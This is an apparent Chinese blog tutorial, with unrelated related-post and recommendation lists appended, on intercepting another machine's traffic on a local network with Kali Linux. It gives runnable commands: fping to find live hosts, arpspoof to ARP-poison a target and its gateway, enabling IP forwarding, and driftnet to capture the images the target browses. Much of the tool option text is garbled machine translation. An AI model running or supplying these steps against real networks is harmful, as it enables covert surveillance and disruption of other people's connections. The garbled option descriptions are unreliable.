需要用到 fping工具 用-asg参数

调查选项:

-4,ipv4只能ping ipv4地址

-6——ipv6只在ping ipv6地址

-b——大小=字节数量的ping数据以字节的方式发送(默认为:56)

-B——backoff=N设置指数backoff因子到N(默认值:1。5)

——count=N计数模式:向每个目标发送N个ping信号

-f文件=文件读取目标文件的文件列表(-表示stdin)

-g——生成生成目标列表(只有在没有-f指定的情况下)

(在目标列表中给出开始和结束IP,或者是CIDR地址)

(例如,fping-g 192.168.1.0 192.168.1.255或fping-g 192.168.1.0/24)

-H,ttl=N设置了IP ttl值(用于实时跳转的时间)

——iface=iface绑定到一个特定的接口

-l——循环循环模式:永远发送ping信号

-m,全部使用提供主机名的ip(如IPv4和IPv6),使用-A

-dontfrag设置了不分段标记

-O-tos=N在ICMP包中设置了服务的类型(tos)标志

-p,-周期=MSEC间隔到一个目标(在ms)

(在循环和计数模式中,默认值:1000毫秒)

-r,重试=N的重试次数(默认值:3)

-R——随机随机分组数据(用来挫败链接数据压缩)

-S-src=IP集源地址

-t,-超时=MSEC单独的目标初始超时(默认为500毫秒,

除了-l/-c/-c,它是-p期到2000毫秒)

输出选项:

-a,活着的目标是活着的

-A-addr通过地址显示目标

-C,vcount=N和-C,以详细格式报告结果

——在每个输出行之前,时间戳打印时间戳

-e——在返回的包中运行的时间

-i-间隔=MSEC间隔发送ping包(默认值:10毫秒)

-n,名称以名称显示目标(-d是等价的)

-N-netdata输出可兼容netdata(-l-Q是必需的)

-o-停机显示了累计的宕机时间(丢失的包包间隔)

-q-安静的安静(不要显示每一个目标/每平的结果)

-Q-s=SECS与-Q相同,但每n秒显示一次

-s,统计打印最终数据

-u-无法到达的目标是无法到达的

- v,版本显示的版本

查看你扫描到的ip

开启arp欺骗用 arpspoof -i eth0 -t 192.168.1.5 192.168.1.1

选项

- i 指定要使用的接口。

- c的主机| |

在恢复arp映射时指定使用哪个硬件地址

成形;在清理时,可以用自己的包发送数据包

地址和主机地址。发送的数据包

一个虚假的hw地址会破坏与某些特定的连接

转换/ap/桥配置,但是它更可靠

而不是使用自己的地址,这是arps的默认方式

事后清理。

- t目标

指定一个特定的主机到ARP毒药(如果没有指定的话

局域网主机)。重复指定多个主机。

-r毒害两个主机(主机和目标)以捕获两者的通信量

的方向。(只在与-t的联合中有效)

主机指定要截获数据包的主机(通常是

本地网关)。

反馈成功后靶机断网(arp攻击)

关掉进程

开启本地的ip转发

root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward

在进行(arp欺骗) arpspoof -i eth0 -t 192.168.1.5 192.168.1.1

目标可以上网

使用root@kali:~# driftnet -i eth0 工具查看靶机浏览的图片信息

选项:

-h显示这个帮助信息。

- v详细操作。

- b当一个新图像被捕获时,b蜂鸣。

-i接口选择要监听的接口(默认:所有

接口)。

-f文件而不是监听接口,读取捕获

来自pcap转储文件的数据包;文件可以是命名管道

用于与Kismet或相似的用途。

-p不把监听接口设置为混乱模式。

辅助模式:不要在屏幕上显示图像,而是保存

将它们放到一个临时目录中,并在上面公布它们的名称

标准输出。

在临时目录中保存的图像的最大数量

在兼职模式。

-d目录使用指定的临时目录。

-x前缀在保存图像时使用。

-s尝试从网络中提取音频数据,

除了图像。目前,这支持MPEG数据

只有。

-S提取音频流,而不是图像。

-M命令使用给定的命令来播放MPEG音频数据

s选项;这应该处理MPEG帧

提供的标准输入。默认值:“mpg123——”。

主要参数:

-b               捕获到新的图片时发出嘟嘟声

-i  interface     选择监听接口

-f  file   读取一个指定pcap数据包中的图片

-p  不让所监听的接口使用混杂模式

-a  后台模式:将捕获的图片保存到目录中(不会显示在屏幕上)

-m number 指定保存图片数的数目

-d directory  指定保存图片的路径

-x prefix  指定保存图片的前缀名

使用举例:

1.实时监听: driftnet -i wlan0

2.读取一个指定pcap数据包中的图片: driftnet -f /home/linger/backup/ap.pcapng -a -d /root/drifnet/

kali之获取靶机的图片和看的url的更多相关文章

  1. kali渗透综合靶机(一)--Lazysysadmin靶机

    kali渗透综合靶机(一)--Lazysysadmin靶机 Lazysysadmin靶机百度云下载链接:https://pan.baidu.com/s/1pTg38wf3oWQlKNUaT-s7qQ提 ...

  2. kali渗透综合靶机(十五)--Breach-1.0靶机

    kali渗透综合靶机(十五)--Breach-1.0靶机 靶机下载地址:https://download.vulnhub.com/breach/Breach-1.0.zip 一.主机发现 1.netd ...

  3. iOS检测用户截屏并获取所截图片

    iOS检测用户截屏并获取所截图片 微信可以检测到用户截屏行为(Home + Power),并在稍后点击附加功能按钮时询问用户是否要发送刚才截屏的图片,这个用户体验非常好.在iOS7之前, 如果用户截屏 ...

  4. IOS: 使用imageIO获取和修改图片的exif信息

    使用imageIO获取和修改图片的exif信息 一幅图片除了包含我们能看见的像素信息,背后还包含了拍摄时间,光圈大小,曝光等信息.UIImage类将这些细节信息都隐藏了起来,只提供我们关心的图片尺寸, ...

  5. 使用jquery获取网页中图片的高度——解惑

    jQuery获取网页中图片的高度 使用jquery获取网页中图片的高度其实很简单,有两种常用的方法都可以打到我们的目的 $("img").whith();(返回纯数字) $(&qu ...

  6. kali渗透综合靶机(十八)--FourAndSix2靶机

    kali渗透综合靶机(十八)--FourAndSix2靶机 靶机下载地址:https://download.vulnhub.com/fourandsix/FourAndSix2.ova 一.主机发现 ...

  7. kali渗透综合靶机(十二)--SickOs1.2靶机

    kali渗透综合靶机(十二)--SickOs1.2靶机 靶机下载地址:https://www.vulnhub.com/entry/sickos-12,144/ 一.主机发现 1.netdiscover ...

  8. kali渗透综合靶机(十)--Raven靶机

    kali渗透综合靶机(十)--Raven靶机 一.主机发现 1.netdiscover -i eth0 -r 192.168.10.0/24 二.端口扫描 1. masscan --rate=1000 ...

  9. kali渗透综合靶机(八)--Billu_b0x靶机

    kali渗透综合靶机(八)--Billu_b0x靶机 靶机下载地址:https://download.vulnhub.com/billu/Billu_b0x.zip 一.主机发现 1.netdisco ...

随机推荐

  1. ubuntu鼠标和触摸板的禁用

    ubuntu鼠标和触摸板的禁用 学习了:http://www.2cto.com/os/201308/239403.html 在终端下直接执行以下命令来打开或关闭触摸板. sudo modprobe - ...

  2. leetcode 刷题之路 66 Path Sum II

    Given a binary tree and a sum, find all root-to-leaf paths where each path's sum equals the given su ...

  3. mysql-联结

    一.联结 联结是利用SQL的select能执行的最重要的操作. 1.关系表:假如有一个包含产品目录的数据库表,其中每个类别的物品占一行.对于每种物品要求存储的信息包括产品描述和价格,以及生产该产品的供 ...

  4. 【SSH 基础】浅谈Hibernate关系映射(3)

    继上篇博客 一对多关联映射(单向) 上面我们介绍了多对一,我们反过来看一对多不就是多对一吗?那还用再进行不同的映射吗?有什么区别吗?一对多和多对一映射原理是一致的,存储是同样的.也就是生成的数据库的表 ...

  5. 在PyCharm中以root权限运行和调试python代码

    python中有的代码可能需要su权限,如 import os os.mkdir('/media/xxx/disk_a') 如果在交互式环境中使用,需要以sudo的方式启动python.而在PyCha ...

  6. 设计url 通过分发的方式 Xadmin_demo

    如 urlpatterns = [ url(r'^Xadmin/',([ url(r'^add/$', views.add) url(r'^delete/$', views.delete) ], No ...

  7. Dictionary as a set of counters

    Suppose you are given a string and you want to count how many times each letters appears. There are ...

  8. 机器学习(七) PCA与梯度上升法 (下)

    五.高维数据映射为低维数据 换一个坐标轴.在新的坐标轴里面表示原来高维的数据. 低维 反向 映射为高维数据 PCA.py import numpy as np class PCA: def __ini ...

  9. 把枚举类型绑定到datasource

    /// <summary> ///ProjectPriority 的摘要说明 /// </summary> public enum ProjectPriority { 极低 = ...

  10. UI Framework-1: Aura Gesture Recognizer

    Gesture Recognizer Gesture Recognizer Overview This document describes the process by which Touch Ev ...